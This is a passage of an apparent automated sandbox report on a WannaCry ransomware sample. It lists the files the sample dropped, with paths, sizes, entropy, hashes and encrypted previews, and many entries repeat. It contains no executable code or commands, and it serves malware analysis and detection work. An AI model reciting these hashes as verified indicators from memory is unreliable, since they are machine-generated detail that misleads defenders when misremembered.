                                                                                      SHA-512:B035F295AB3AA5DE9E2463A15A74B2E7EF75C8E488F8D748CA81257F4593422454D036C1560AFE6D29BFBF6444CB1F299E89B62B1F79872BFEB6C402DA0FE307
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........~...c.....K )Pq..........{.X?....%.......d...x.<2..)...&....L.4&..$.e..nf...>..K..&O.....o^..4.<..l..........<i....%.b.!HB....... .TiO...l%.r'0.Ry0.....l.K:....+.......I..I_..2..H..F.h.f...U........7..0.OM..p..;...J.SJ......]l..'...J....hK.....$........G....x..W...."4....7/..T(~..Gr.....v.-Gf..C......`4Q.M-a.Ad...T.^... .....y.`..e....]..`:....`$..S..+z..F5u........9.....f...A...L^..\....P.SX..2}?,.|$..Zu...p.t..w.d&.#%.....O.p.0.x.-..38.7.....hY.?.....;..X*uh..b:.\:.#C...`..X.....c..tK.U.G..&d\7..N.Fel|.........f.....4..M.fyy{.6.k..J....,........E?%.....'..|...O..R.x.Z".=&,....!...NM....[.\=F.e:\.A..i4L.n.U|...s...G...&2P.oJd....:.Ig.Y..9...,.As.kz0...t.^B.X.........x]A4.......C..NJ.W..`.9.V.I... .~..+...6@8.P..b...Z..,.j.4..."w..:...-..v)..D.9Q.....0..&-.!.V.......j..d;K.DG'..,{Qx.9=....#QE..."....e.#.0...h.X..b.m_../r...fC..G...b"Q.....C...#.KKr.....J_...b:D.r...-$.9.Q.g4...`H..?.v}....d...8....;.d...:`...r/.d.Oz./jRj.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7752
                                                                                      Entropy (8bit):7.9756158511082855
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:H8Bhj2PtbWh//p6gUMidCH3xhF94BcgEYUi9kIE6G8B/10j:H8nj2PdWdMgAdCBZCxE6DNe
                                                                                      MD5:6CB75E13BCD806595F98C6FAA77972B8
                                                                                      SHA1:4D85BEA0874901CAFA29AADC7EF7551C7CFA5905
                                                                                      SHA-256:4318080ECC4C93F8ACED0FE6C29E81759C9254FD43DAFF06C3FB641EBC26A681
                                                                                      SHA-512:B035F295AB3AA5DE9E2463A15A74B2E7EF75C8E488F8D748CA81257F4593422454D036C1560AFE6D29BFBF6444CB1F299E89B62B1F79872BFEB6C402DA0FE307
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........~...c.....K )Pq..........{.X?....%.......d...x.<2..)...&....L.4&..$.e..nf...>..K..&O.....o^..4.<..l..........<i....%.b.!HB....... .TiO...l%.r'0.Ry0.....l.K:....+.......I..I_..2..H..F.h.f...U........7..0.OM..p..;...J.SJ......]l..'...J....hK.....$........G....x..W...."4....7/..T(~..Gr.....v.-Gf..C......`4Q.M-a.Ad...T.^... .....y.`..e....]..`:....`$..S..+z..F5u........9.....f...A...L^..\....P.SX..2}?,.|$..Zu...p.t..w.d&.#%.....O.p.0.x.-..38.7.....hY.?.....;..X*uh..b:.\:.#C...`..X.....c..tK.U.G..&d\7..N.Fel|.........f.....4..M.fyy{.6.k..J....,........E?%.....'..|...O..R.x.Z".=&,....!...NM....[.\=F.e:\.A..i4L.n.U|...s...G...&2P.oJd....:.Ig.Y..9...,.As.kz0...t.^B.X.........x]A4.......C..NJ.W..`.9.V.I... .~..+...6@8.P..b...Z..,.j.4..."w..:...-..v)..D.9Q.....0..&-.!.V.......j..d;K.DG'..,{Qx.9=....#QE..."....e.#.0...h.X..b.m_../r...fC..G...b"Q.....C...#.KKr.....J_...b:D.r...-$.9.Q.g4...`H..?.v}....d...8....;.d...:`...r/.d.Oz./jRj.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2344
                                                                                      Entropy (8bit):7.921136750796453
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkCFyc8B0hg5FXsMpxm1xiz0sn6QaDbNSoLQ69s+UYDO1LhJYI3q8fuf:oCFyvB0hg5FXsMm1kzsQaPNSobcYyBrA
                                                                                      MD5:8F34DF197BB4DFB4E4BB9BAF4BB04519
                                                                                      SHA1:D2511BE64E66B2FD65526E7F7C3ED91378C8D5B2
                                                                                      SHA-256:90D2731FC263AB4F44BC06796F4FFB915B29A5E8C73C8ED91ACF7E7F21699FC4
                                                                                      SHA-512:FF23DB95524C365E18DC102C9C59B0C10F88A47903EFF369E5D669DC2DBED086E073568315956A01D4E0DA6E666A9BEC0D2D7B5ACF8870DDF1417EE564AFCA33
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X9...i...d%<....f............(.5...`XV...uGOR.|<.{W..[.]..<$......".....=..\.o."....n..eEPD.K&...V.6v.H..X..p...;..@[..2C...O.Z....s..b...y0.....K........7`bC?.T8...Z...n.l^..o.)3.<C.T.?wi..)h5...J...<5....0....@j4..m.X;&.L.y'.,.r<h.6.Q6....['............4S......2..~..CU^.B+.|r_R.DYF....8..N....[..`.i.MS$...:il..h.c....F...i...]..:.......t..'..?Vo....C...a......F".s.yXt0...=.....;w....<.....').V..Q....h!.....r.M_5.....m.<6.4.'.d.ge....6pcfY...~E.x.$r"...>..l.hF...-..&.$T.\.........0ex<..".{..)..xI...<....qcQ.:.(:.<......x....)....I.|..$#...+.=..[..q(.N>i..~...1....afjb..a.v....W.....i..`..-?...l..'.k@...#.....o.>3..3'.Z..{+I#83.?t....`.k..L*.i....Z.|l.^*.@..r..6 .9.r.n.v;[..dH}.q{.Y...#}3$....Bf@B....k.k:..j/.[9W,.Z|.z........l.......w..ES.3..5&5..HY=.;A?O.\[I.......>..h..+..dWd[%P..Dc......%n..p.cPb.../g..v..:).(4E.+.k.?.......{.R....SO2...#.Hw.;.3..pt[xu..#.#...|..aAo..}...L....6....\..!....w.h.)2.....u@hA.g....0p.,i.|..Um...O2w-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2344
                                                                                      Entropy (8bit):7.921136750796453
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkCFyc8B0hg5FXsMpxm1xiz0sn6QaDbNSoLQ69s+UYDO1LhJYI3q8fuf:oCFyvB0hg5FXsMm1kzsQaPNSobcYyBrA
                                                                                      MD5:8F34DF197BB4DFB4E4BB9BAF4BB04519
                                                                                      SHA1:D2511BE64E66B2FD65526E7F7C3ED91378C8D5B2
                                                                                      SHA-256:90D2731FC263AB4F44BC06796F4FFB915B29A5E8C73C8ED91ACF7E7F21699FC4
                                                                                      SHA-512:FF23DB95524C365E18DC102C9C59B0C10F88A47903EFF369E5D669DC2DBED086E073568315956A01D4E0DA6E666A9BEC0D2D7B5ACF8870DDF1417EE564AFCA33
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....X9...i...d%<....f............(.5...`XV...uGOR.|<.{W..[.]..<$......".....=..\.o."....n..eEPD.K&...V.6v.H..X..p...;..@[..2C...O.Z....s..b...y0.....K........7`bC?.T8...Z...n.l^..o.)3.<C.T.?wi..)h5...J...<5....0....@j4..m.X;&.L.y'.,.r<h.6.Q6....['............4S......2..~..CU^.B+.|r_R.DYF....8..N....[..`.i.MS$...:il..h.c....F...i...]..:.......t..'..?Vo....C...a......F".s.yXt0...=.....;w....<.....').V..Q....h!.....r.M_5.....m.<6.4.'.d.ge....6pcfY...~E.x.$r"...>..l.hF...-..&.$T.\.........0ex<..".{..)..xI...<....qcQ.:.(:.<......x....)....I.|..$#...+.=..[..q(.N>i..~...1....afjb..a.v....W.....i..`..-?...l..'.k@...#.....o.>3..3'.Z..{+I#83.?t....`.k..L*.i....Z.|l.^*.@..r..6 .9.r.n.v;[..dH}.q{.Y...#}3$....Bf@B....k.k:..j/.[9W,.Z|.z........l.......w..ES.3..5&5..HY=.;A?O.\[I.......>..h..+..dWd[%P..Dc......%n..p.cPb.../g..v..:).(4E.+.k.?.......{.R....SO2...#.Hw.;.3..pt[xu..#.#...|..aAo..}...L....6....\..!....w.h.)2.....u@hA.g....0p.,i.|..Um...O2w-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1880
                                                                                      Entropy (8bit):7.888316426855325
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkE3Ogvqk9f4kbs3lSTfAUjBFR/eOLxOBxA4QO45+s4vaY00nnw:oahbOlSTfAU1X5VT4QO4550Q0nnw
                                                                                      MD5:10143885637426FAFE5A20793DD6C331
                                                                                      SHA1:39E0B5ADA07E4C3820AC4B13BC9E27DDE4E9E108
                                                                                      SHA-256:A64511B064F14061F19C3A94A1696E89817D771266CEF6622E7665E25715AB76
                                                                                      SHA-512:B189337E535BA5840DAB278EA101434EB55FEC9C12545C18CCB94C16C0A233BE7C8AEFDCD6FA5EB998990F2A594A5C19E3F4AF7400F52973BB641FC12299B84A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......x8#8(.h...N....r.f......8...L.b....YUf}.Z......\...tE..%..P..57.........Z..|....%....a..P<...:>.>.;..m..x.G.).R)n.l,..@.I...Z..W..^....y. ..s.&$..8.e.s4......Ky.#X....p.o8 .'..:Yq...Na..o.y0.z.M.iH..2...a'E>?..Wy.....6a....[...?V....k...r<.......3.......l..q(9.}...z.....`a..a......]./..#.Ia..x=..[9....*.cx.:.....I.a...........W.....(..].V..z.!G..T.U....$...........=.......T.WpU.....?.U..M!#b..Ab..SJU..,.=\<|...).K+LBd.m.k...a(.R$l.0.;...W....,...%...=H./......b.JDE....et.......o.Z.t....,.+.Sa...=...4.\..S.;tD..|=.&t..{....0+.h+..n..!X7X}.@.^.~..Q....#\.Z...k......O;:....L7.Ql}....x........mR.&a..i...P.....gV3..O=cB...+,4...........8m8G.MS9VV}4!.."E.X.R.7e)6%.;.6....L....I...VhG.S..N..%P(..z...@e.Z..N.@......I..'../[n.....% D.y.e.`X'.b..r..W.....j..!...8.:..Sj.r....1.l.S/..!@P.......m-..MJ.d..1......}9.q..4...........\.-..d....-.lHj.^..P..f...N.lO.}C.E.`...Z..b..Z.i.v.s...l}..]....u...LT!....i...~.q......-cL`z.ri.~..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1880
                                                                                      Entropy (8bit):7.888316426855325
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkE3Ogvqk9f4kbs3lSTfAUjBFR/eOLxOBxA4QO45+s4vaY00nnw:oahbOlSTfAU1X5VT4QO4550Q0nnw
                                                                                      MD5:10143885637426FAFE5A20793DD6C331
                                                                                      SHA1:39E0B5ADA07E4C3820AC4B13BC9E27DDE4E9E108
                                                                                      SHA-256:A64511B064F14061F19C3A94A1696E89817D771266CEF6622E7665E25715AB76
                                                                                      SHA-512:B189337E535BA5840DAB278EA101434EB55FEC9C12545C18CCB94C16C0A233BE7C8AEFDCD6FA5EB998990F2A594A5C19E3F4AF7400F52973BB641FC12299B84A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......x8#8(.h...N....r.f......8...L.b....YUf}.Z......\...tE..%..P..57.........Z..|....%....a..P<...:>.>.;..m..x.G.).R)n.l,..@.I...Z..W..^....y. ..s.&$..8.e.s4......Ky.#X....p.o8 .'..:Yq...Na..o.y0.z.M.iH..2...a'E>?..Wy.....6a....[...?V....k...r<.......3.......l..q(9.}...z.....`a..a......]./..#.Ia..x=..[9....*.cx.:.....I.a...........W.....(..].V..z.!G..T.U....$...........=.......T.WpU.....?.U..M!#b..Ab..SJU..,.=\<|...).K+LBd.m.k...a(.R$l.0.;...W....,...%...=H./......b.JDE....et.......o.Z.t....,.+.Sa...=...4.\..S.;tD..|=.&t..{....0+.h+..n..!X7X}.@.^.~..Q....#\.Z...k......O;:....L7.Ql}....x........mR.&a..i...P.....gV3..O=cB...+,4...........8m8G.MS9VV}4!.."E.X.R.7e)6%.;.6....L....I...VhG.S..N..%P(..z...@e.Z..N.@......I..'../[n.....% D.y.e.`X'.b..r..W.....j..!...8.:..Sj.r....1.l.S/..!@P.......m-..MJ.d..1......}9.q..4...........\.-..d....-.lHj.^..P..f...N.lO.}C.E.`...Z..b..Z.i.v.s...l}..]....u...LT!....i...~.q......-cL`z.ri.~..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2152
                                                                                      Entropy (8bit):7.91467333793397
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkMCqtj/8Z/Nqstl2J1a5elJQfz5agUVHQVxk:oeEZ/U6l2JUJfjpk
                                                                                      MD5:591FDA353E53536316EF9DBA13011801
                                                                                      SHA1:90CC58DE3C7F11F65F2E752C85077E7F958CF583
                                                                                      SHA-256:A215F627F7FE3FC74601A9428EBB00B5F13740EF41128753AF0F68B95513101C
                                                                                      SHA-512:55D20268E1467D6787E4918C02BB73C9B46448961CE09213F99129F3F5450DF7C8AEAC9DEFCE97FAD0C505A5E9CB9AB6A702F13CE8F37567A057A5D384009110
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8.r...A..w...y.......nnNH.p...].....J......8&.bD.d.@.7j.r.E..#'...v.h.Z..:..H..j....C..f.fw..5D.Us.j.$.=.N..........(La. ..DN.T.b.eQA....Y.<]+....~. di...7.:BQ.X$.1..'..E.M+.*....!.0b.L...X.....;...o..arc9|r.h.8...J......]Ea.oEE.L(.1...%...%\....C.......c....|...g.4...1.C..|...f.....3$.....u.5..^2@.N.0....6...5b..\i....... %...>...D.0.6..f........R...vfh.Z..i.....Au]R........W1.@..+d(*..~..4....q<F....NO......d....!9Z...._.}.c0.^K.6.Y...n....2.\.....,L.a.5.B..R.:......{;..[..Jl..3.w..3........(.[A%.............$C....8."C..X..K{].d(....$.....5...#%....o.Q..1oQ..N0.....?.+...........B7.K'.r..<.1...rO....vo.....HI..Se..oY.....(*.......;..3..i....p._.W...t...*.$=.'t..r..R .....5..C....o'N..U.G.h.7..V'.(.....=.)".$......?l.%@........3;...yf6`......A+[9...C,...?.Z..Q.|a.ZrQ.....s........`. ....o*...i....<.I.-K6....TK.$.,.Z...0@N5.VR....`/....5...Ns..oH.]a..<.UW.R.Pl..4......ka.e!2......0.D:u......g..n...Ss...mW..2:..+...-GJ.v..*..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2152
                                                                                      Entropy (8bit):7.91467333793397
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkMCqtj/8Z/Nqstl2J1a5elJQfz5agUVHQVxk:oeEZ/U6l2JUJfjpk
                                                                                      MD5:591FDA353E53536316EF9DBA13011801
                                                                                      SHA1:90CC58DE3C7F11F65F2E752C85077E7F958CF583
                                                                                      SHA-256:A215F627F7FE3FC74601A9428EBB00B5F13740EF41128753AF0F68B95513101C
                                                                                      SHA-512:55D20268E1467D6787E4918C02BB73C9B46448961CE09213F99129F3F5450DF7C8AEAC9DEFCE97FAD0C505A5E9CB9AB6A702F13CE8F37567A057A5D384009110
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8.r...A..w...y.......nnNH.p...].....J......8&.bD.d.@.7j.r.E..#'...v.h.Z..:..H..j....C..f.fw..5D.Us.j.$.=.N..........(La. ..DN.T.b.eQA....Y.<]+....~. di...7.:BQ.X$.1..'..E.M+.*....!.0b.L...X.....;...o..arc9|r.h.8...J......]Ea.oEE.L(.1...%...%\....C.......c....|...g.4...1.C..|...f.....3$.....u.5..^2@.N.0....6...5b..\i....... %...>...D.0.6..f........R...vfh.Z..i.....Au]R........W1.@..+d(*..~..4....q<F....NO......d....!9Z...._.}.c0.^K.6.Y...n....2.\.....,L.a.5.B..R.:......{;..[..Jl..3.w..3........(.[A%.............$C....8."C..X..K{].d(....$.....5...#%....o.Q..1oQ..N0.....?.+...........B7.K'.r..<.1...rO....vo.....HI..Se..oY.....(*.......;..3..i....p._.W...t...*.$=.'t..r..R .....5..C....o'N..U.G.h.7..V'.(.....=.)".$......?l.%@........3;...yf6`......A+[9...C,...?.Z..Q.|a.ZrQ.....s........`. ....o*...i....<.I.-K6....TK.$.,.Z...0@N5.VR....`/....5...Ns..oH.]a..<.UW.R.Pl..4......ka.e!2......0.D:u......g..n...Ss...mW..2:..+...-GJ.v..*..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.8719817845841105
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMfmN19SdzrmELgUxNv6FPKt81xKeJJX7CNXpgNq9+C931o/H/j42zMyH7F78cg:bkMulSdz0K8PnCcTC931UH/nMADqVhOg
                                                                                      MD5:EA220EE483F7758AC0F4507911156535
                                                                                      SHA1:583865F76C5B488092FD36DC7B22AF2C856DB82B
                                                                                      SHA-256:1F8068F3BFC328F066A9B18E2988889EBD66AD8CFF0834CE38BDEF914539E5AE
                                                                                      SHA-512:C51E2FF0A37BE8C3DAD357E0B3AA5D5C8F2E69A4EF57EED59BBA8FB6FC3179D8AF678F215D5AA064FED4B9047566F639A9C62B765C22180A42124E8EB1C6E1D2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........X.IB......uT.%?...g]@.ai.O.C.}[b.).W.`.>....T...pE..+.h.*Ht+...L..r.......2..'...q.}/.........7j.......y.J....|.Mz..?.-a.........p..cU..ZF./.9..e...Uu.)....\..yv..Z.Zb.._.z.....I..f..r.6.P....(. ._....i.\...xH.}?D..G]...+x..~.5%Z.I%zq.....#...........U.w$...1.f.o...z.5.N.8,0tZy.Qz...E.Lj?....F...c.9..4....P.Q.J}..*L..WX...v.a..1..$.`lIt........|1*..*].....+.X..fQC8.b..N..H..Y.q...p.({..(..<U#-.....S...M>0DH..W0...r..]..m:..(..T.vq..R..#..5-~. .5...T.m.%.gi.|....x.L&Q+H.fs..5.l..A.CUwe3..1L...l(.i..Z...{...%D]..l.r...H.@.`v.]K.L.n.....=.[.2.d.k.F7...B~.U...L....$..s.'Q.7......CS2.3...{k+..!.^Y..z,8...*tb..;..u...+...Hu.U.......G.BD.g~..C....Du.H..\...b.'S.~.........ZV..w...../...<..a2.*n.'.[... .<~....2....5r.i...R..k.1.....t.Z...........H...<a.xcu{..@h....\Ne.7l...(.m}l@.W...}.\:H.X...tV.`LZ.CkR.>..s.E... ...;...c".G#'.(#.A#-&....._......WUJ<.....%..|..?L8v.........A.8.Y.A.=..&..>...I.t.........,...)%}r.&..?.ji.T.8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1608
                                                                                      Entropy (8bit):7.8719817845841105
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkMfmN19SdzrmELgUxNv6FPKt81xKeJJX7CNXpgNq9+C931o/H/j42zMyH7F78cg:bkMulSdz0K8PnCcTC931UH/nMADqVhOg
                                                                                      MD5:EA220EE483F7758AC0F4507911156535
                                                                                      SHA1:583865F76C5B488092FD36DC7B22AF2C856DB82B
                                                                                      SHA-256:1F8068F3BFC328F066A9B18E2988889EBD66AD8CFF0834CE38BDEF914539E5AE
                                                                                      SHA-512:C51E2FF0A37BE8C3DAD357E0B3AA5D5C8F2E69A4EF57EED59BBA8FB6FC3179D8AF678F215D5AA064FED4B9047566F639A9C62B765C22180A42124E8EB1C6E1D2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...........X.IB......uT.%?...g]@.ai.O.C.}[b.).W.`.>....T...pE..+.h.*Ht+...L..r.......2..'...q.}/.........7j.......y.J....|.Mz..?.-a.........p..cU..ZF./.9..e...Uu.)....\..yv..Z.Zb.._.z.....I..f..r.6.P....(. ._....i.\...xH.}?D..G]...+x..~.5%Z.I%zq.....#...........U.w$...1.f.o...z.5.N.8,0tZy.Qz...E.Lj?....F...c.9..4....P.Q.J}..*L..WX...v.a..1..$.`lIt........|1*..*].....+.X..fQC8.b..N..H..Y.q...p.({..(..<U#-.....S...M>0DH..W0...r..]..m:..(..T.vq..R..#..5-~. .5...T.m.%.gi.|....x.L&Q+H.fs..5.l..A.CUwe3..1L...l(.i..Z...{...%D]..l.r...H.@.`v.]K.L.n.....=.[.2.d.k.F7...B~.U...L....$..s.'Q.7......CS2.3...{k+..!.^Y..z,8...*tb..;..u...+...Hu.U.......G.BD.g~..C....Du.H..\...b.'S.~.........ZV..w...../...<..a2.*n.'.[... .<~....2....5r.i...R..k.1.....t.Z...........H...<a.xcu{..@h....\Ne.7l...(.m}l@.W...}.\:H.X...tV.`LZ.CkR.>..s.E... ...;...c".G#'.(#.A#-&....._......WUJ<.....%..|..?L8v.........A.8.Y.A.=..&..>...I.t.........,...)%}r.&..?.ji.T.8
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):408
                                                                                      Entropy (8bit):7.421708536788139
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEjI71EGH7mdttxo5rWwd7Sr4YHyEotuJ+:bkWIxDH7E7arWwlSr3HlotS+
                                                                                      MD5:E0E6D3A3AECB173FB7ED06378F1EB3B6
                                                                                      SHA1:9A7B2B34E29A9DE5E1C8D26211BE5AED888CDBB7
                                                                                      SHA-256:40F5822DF7086792ED9AB394EE51C93E37F6D9BA81ED92807F2704FFF4063857
                                                                                      SHA-512:4D017F591B515EFCE04425ABE7964AC423090F0D297362B4AA45390712672ADEDCF0E08BE383AA5760DD83F47BEB1919724B049485E81488949F25BF4B54BB9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....}G.6.}.....C-K..-1.......C0..ch#....m.XA...wt...!yi...%...q.bJc..`B)......(...8........'.4s.M.....a.t.f-.M..C..F.e.$.....|....tN..s..VY...k.7.o.0'N..$.c.Kuo...bW...N./......;...e.n..(..g.{.|.'..L.%..&Y..V.n_..,..',I\....+."...0R.G........4.hsMq....o....q..........x.z.MW.7...V+..8..8x..3..J.=...?...m*.P.:y.ec.DX.f..`.6........NND..u..... .../.%.a$q.b....9!.......9..2~~...qV.,g...).qH.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):408
                                                                                      Entropy (8bit):7.421708536788139
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEjI71EGH7mdttxo5rWwd7Sr4YHyEotuJ+:bkWIxDH7E7arWwlSr3HlotS+
                                                                                      MD5:E0E6D3A3AECB173FB7ED06378F1EB3B6
                                                                                      SHA1:9A7B2B34E29A9DE5E1C8D26211BE5AED888CDBB7
                                                                                      SHA-256:40F5822DF7086792ED9AB394EE51C93E37F6D9BA81ED92807F2704FFF4063857
                                                                                      SHA-512:4D017F591B515EFCE04425ABE7964AC423090F0D297362B4AA45390712672ADEDCF0E08BE383AA5760DD83F47BEB1919724B049485E81488949F25BF4B54BB9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....}G.6.}.....C-K..-1.......C0..ch#....m.XA...wt...!yi...%...q.bJc..`B)......(...8........'.4s.M.....a.t.f-.M..C..F.e.$.....|....tN..s..VY...k.7.o.0'N..$.c.Kuo...bW...N./......;...e.n..(..g.{.|.'..L.%..&Y..V.n_..,..',I\....+."...0R.G........4.hsMq....o....q..........x.z.MW.7...V+..8..8x..3..J.=...?...m*.P.:y.ec.DX.f..`.6........NND..u..... .../.%.a$q.b....9!.......9..2~~...qV.,g...).qH.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58984
                                                                                      Entropy (8bit):7.997197907763492
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:iyRT4/CyhQCtC2a1w3W7CDVD8ITdQOkdnMBF:/RT4/JQXqh8udQ4T
                                                                                      MD5:4F6E8E815E0B56130E311ED5B192E192
                                                                                      SHA1:3C6709E1435641D3602C543ECF5656CFDF4D27ED
                                                                                      SHA-256:9CD1B5182E9EA9F1C8D848A134C9512EE67ACCE1F247196C36DD25A892EFFBD2
                                                                                      SHA-512:B1F44C043F923A131B86AADF8FA9B3F5146B4FAE417151E8EE280B66CCF460AFDBF33AD6B9AD0F4DACFB9EF12A7A94B556EFD82BCF8026C7A14BD8D4EB08F49A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........,.<.6...^^......}.d...x.r.E.T..D.~.Ln.Y.q(H...!@U..e.S.A...}`Lj%E....X. ....E0h.=.!..\*.."........{.W.1.8...q...x..f:.d.~x..".. YWJ..'^.9..Z.;..WB#9...vq..Q..?.%.E...zAK./D7....i.....j....~.......L...9.f:y.....~Dz;k.+.J......h.].....uv. ...}....G.........d..).5.[jQ.I*DA...........86|..L.......;zwu(2.(.%d_.H5.8.1....t:g....kO}............d5.V.P.l.qiS.L.<B..-W_....S..4%.1J....Q...v......,.TB..../...E....R.....x....^.d........'c6.....]X..mO>WX...724.5..H.e..g(. 2..I..f..+.....J.Td........ir.t_d..,.....6.=YKQe.)."...H.QU..R;..U..qD.....a..,.A....K....=].7..!..6...c..n.:;./..........(...&<....SQ.}X.?..zr.o...9..[+....r.6Zh7D8....7.....ok|d[..#...SOIi...E.^..f..p`.Ab!,......_..E.......*..S..C...aW...+|...........sK..^..9.o.V.....y...v_... ......+T..rM....0.<.e>.S...&.L.U..}9|..o.~<..z..Ta.R.{{`..!=.3O.g..eE...j[4F.....{..Uc.....;.E...m..R..'..,B.z.0..^2..6z.J0.y.X....W.W^|.`.V...'.....7.c.wF...\vl]..Y..\.k.9..&..h.y.f...w.t..0..A.D*t78
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58984
                                                                                      Entropy (8bit):7.997197907763492
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:iyRT4/CyhQCtC2a1w3W7CDVD8ITdQOkdnMBF:/RT4/JQXqh8udQ4T
                                                                                      MD5:4F6E8E815E0B56130E311ED5B192E192
                                                                                      SHA1:3C6709E1435641D3602C543ECF5656CFDF4D27ED
                                                                                      SHA-256:9CD1B5182E9EA9F1C8D848A134C9512EE67ACCE1F247196C36DD25A892EFFBD2
                                                                                      SHA-512:B1F44C043F923A131B86AADF8FA9B3F5146B4FAE417151E8EE280B66CCF460AFDBF33AD6B9AD0F4DACFB9EF12A7A94B556EFD82BCF8026C7A14BD8D4EB08F49A
                                                                                      Malicious:true
                                                                                      Reputation:low
